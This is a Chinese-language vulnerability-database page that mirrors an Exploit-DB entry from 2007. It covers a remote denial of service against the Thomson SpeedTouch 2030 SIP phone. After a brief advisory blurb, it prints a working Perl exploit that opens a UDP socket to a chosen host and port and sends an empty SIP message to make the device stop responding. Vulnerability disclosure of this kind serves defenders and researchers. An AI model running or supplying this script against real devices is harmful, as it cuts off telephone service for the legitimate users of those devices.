Thomson SpeedTouch 2030 - SIP Empty Message Remote Denial of Service

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1056302 漏洞类型
发布时间 2007-08-28 更新时间 2007-08-28
CVE编号 N/A CNNVD-ID N/A
漏洞平台 Hardware CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/30538
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/25464/info

Thomson SpeedTouch 2030 is prone to a denial-of-service vulnerability because the device fails to handle specially crafted SIP INVITE messages.

Exploiting this issue allows remote attackers to cause the device to stop responding, thus denying service to legitimate users. 

#!/usr/bin/perl

use IO::Socket::INET;

die "Usage $0 <dst> <port> <username>" unless ($ARGV[2]);



$socket=new IO::Socket::INET->new(PeerPort=>$ARGV[1],

        Proto=>'udp',

        PeerAddr=>$ARGV[0]);



$msg = "";

$socket->send($msg);